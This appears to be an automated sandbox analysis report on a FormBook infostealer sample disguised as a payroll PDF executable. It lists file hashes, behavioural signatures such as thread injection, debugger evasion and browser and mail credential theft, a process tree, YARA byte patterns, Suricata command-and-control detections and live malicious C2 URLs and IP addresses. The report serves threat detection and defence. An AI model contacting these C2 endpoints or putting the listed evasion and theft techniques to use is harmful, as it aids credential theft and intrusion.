Edit tour

Windows Analysis Report
PAYROLL SUMMARY _pdf.exe

Overview

General Information

Sample name:	PAYROLL SUMMARY _pdf.exe
Analysis ID:	1490395
MD5:	61b505c361c46a4c09a1e07ff7e168c9
SHA1:	b6c0ac6f7d6dabf4507b696c7f4fb7df56925cb6
SHA256:	ece6e00b972a047c226be550cb05f4c0636e3a50a0a65e595b5286e0e2fcdc4a
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PAYROLL SUMMARY _pdf.exe (PID: 5832 cmdline: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe" MD5: 61B505C361C46A4C09A1E07FF7E168C9)

svchost.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

WsLcnyccsDHmlxczMuydOvvxEH.exe (PID: 5916 cmdline: "C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

clip.exe (PID: 2444 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)

WsLcnyccsDHmlxczMuydOvvxEH.exe (PID: 5968 cmdline: "C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6860 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2567c2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x23fd31:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2567c2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x23fd31:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", CommandLine: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", CommandLine|base64offset|contains: IC, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", ParentImage: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe, ParentProcessId: 5832, ParentProcessName: PAYROLL SUMMARY _pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", ProcessId: 6284, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", CommandLine: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", CommandLine|base64offset|contains: IC, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", ParentImage: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe, ParentProcessId: 5832, ParentProcessName: PAYROLL SUMMARY _pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe", ProcessId: 6284, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 91.195.240.19

Timestamp:	2024-08-09T08:43:19.691812+0200
SID:	2855464
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 194.58.112.174

Timestamp:	2024-08-09T08:43:30.815371+0200
SID:	2855464
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 199.192.19.19

Timestamp:	2024-08-09T08:42:49.639212+0200
SID:	2855464
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 194.58.112.174

Timestamp:	2024-08-09T08:43:38.454474+0200
SID:	2050745
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 43.252.167.188

Timestamp:	2024-08-09T08:41:49.786447+0200
SID:	2855464
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 23.251.54.212

Timestamp:	2024-08-09T08:42:43.875899+0200
SID:	2050745
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 208.91.197.27

Timestamp:	2024-08-09T08:41:27.987267+0200
SID:	2855464
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 208.91.197.27

Timestamp:	2024-08-09T08:41:25.447575+0200
SID:	2855464
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 194.9.94.85

Timestamp:	2024-08-09T08:42:08.965800+0200
SID:	2050745
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 43.252.167.188

Timestamp:	2024-08-09T08:41:47.519113+0200
SID:	2855464
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 194.9.94.85

Timestamp:	2024-08-09T08:42:06.438732+0200
SID:	2855464
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 91.195.240.19

Timestamp:	2024-08-09T08:43:22.352040+0200
SID:	2855464
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 194.58.112.174

Timestamp:	2024-08-09T08:43:35.884606+0200
SID:	2855464
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 199.192.19.19

Timestamp:	2024-08-09T08:42:52.428507+0200
SID:	2855464
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 5.44.111.162

Timestamp:	2024-08-09T08:40:36.796792+0200
SID:	2050745
Severity:	1
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 43.252.167.188

Timestamp:	2024-08-09T08:41:52.326508+0200
SID:	2855464
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 194.9.94.85

Timestamp:	2024-08-09T08:42:03.866274+0200
SID:	2855464
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 213.145.228.16

Timestamp:	2024-08-09T08:43:09.105099+0200
SID:	2855464
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 172.67.210.102

Timestamp:	2024-08-09T08:43:47.726673+0200
SID:	2855464
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 23.251.54.212

Timestamp:	2024-08-09T08:42:18.912011+0200
SID:	2855464
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 217.160.0.106

Timestamp:	2024-08-09T08:40:58.238386+0200
SID:	2855464
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 91.195.240.19

Timestamp:	2024-08-09T08:43:17.146520+0200
SID:	2855464
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 208.91.197.27

Timestamp:	2024-08-09T08:41:22.940737+0200
SID:	2855464
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 213.145.228.16

Timestamp:	2024-08-09T08:43:11.420811+0200
SID:	2050745
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 91.195.240.19

Timestamp:	2024-08-09T08:43:24.953013+0200
SID:	2050745
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 217.160.0.106

Timestamp:	2024-08-09T08:41:00.699315+0200
SID:	2050745
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 194.58.112.174

Timestamp:	2024-08-09T08:43:33.339109+0200
SID:	2855464
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 23.251.54.212

Timestamp:	2024-08-09T08:42:16.365063+0200
SID:	2855464
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 172.67.210.102

Timestamp:	2024-08-09T08:43:45.193327+0200
SID:	2855464
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 199.192.19.19

Timestamp:	2024-08-09T08:42:55.038438+0200
SID:	2855464
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 217.160.0.106

Timestamp:	2024-08-09T08:40:52.676692+0200
SID:	2855464
Severity:	1
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 172.67.210.102

Timestamp:	2024-08-09T08:43:50.255850+0200
SID:	2855464
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 172.67.210.102

Timestamp:	2024-08-09T08:39:59.427410+0200
SID:	2050745
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 213.145.228.16

Timestamp:	2024-08-09T08:43:03.839654+0200
SID:	2855464
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 23.251.54.212

Timestamp:	2024-08-09T08:42:21.474682+0200
SID:	2855464
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 208.91.197.27

Timestamp:	2024-08-09T08:41:31.351763+0200
SID:	2050745
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 213.145.228.16

Timestamp:	2024-08-09T08:43:06.369453+0200
SID:	2855464
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 217.160.0.106

Timestamp:	2024-08-09T08:40:55.206539+0200
SID:	2855464
Severity:	1
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 194.9.94.85

Timestamp:	2024-08-09T08:42:01.305968+0200
SID:	2855464
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 199.192.19.19

Timestamp:	2024-08-09T08:42:57.475244+0200
SID:	2050745
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 43.252.167.188

Timestamp:	2024-08-09T08:41:55.515796+0200
SID:	2050745
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.xn--matfrmn-jxa4m.se/4hda/?_Z1XhZu=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/cDU9mAi5AO1k3J2CN+QyvLAoTep+eWpcszcsTCcamkkP6oiBRs=&f6Gp=VzB4OR5	Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/?f6Gp=VzB4OR5&_Z1XhZu=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG3kGwJkz3gG7EkbGSmwaxQucCWgWcruhZkgDOmNZxE+MWhMf5t0=	Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/	Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.sandranoll.com	Virustotal: Detection: 10%			Perma Link
Source: www.anuts.top	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for submitted file

Source: PAYROLL SUMMARY _pdf.exe	ReversingLabs: Detection: 52%
Source: PAYROLL SUMMARY _pdf.exe	Virustotal: Detection: 26%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PAYROLL SUMMARY _pdf.exe

Joe Sandbox ML: detected

Source: PAYROLL SUMMARY _pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4599743612.0000000000CAE000.00000002.00000001.01000000.00000004.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2405010509.0000000000CAE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2142190742.0000000004490000.00000004.00001000.00020000.00000000.sdmp, PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2141098342.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237570493.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2239322264.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.0000000003700000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2332132673.0000000004573000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.0000000004A6E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2334550588.0000000004721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2142190742.0000000004490000.00000004.00001000.00020000.00000000.sdmp, PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2141098342.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2237570493.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2239322264.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.0000000003700000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000004.00000003.2332132673.0000000004573000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.0000000004A6E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2334550588.0000000004721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000002.00000002.2332101149.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300928384.000000000301A000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4602736718.0000000001088000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000004.00000002.4608397493.0000000004EFC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4600545677.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2409252373.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.000000000677C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000004.00000002.4608397493.0000000004EFC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4600545677.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2409252373.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.000000000677C000.00000004.80000000.00040000.00000000.sdmp
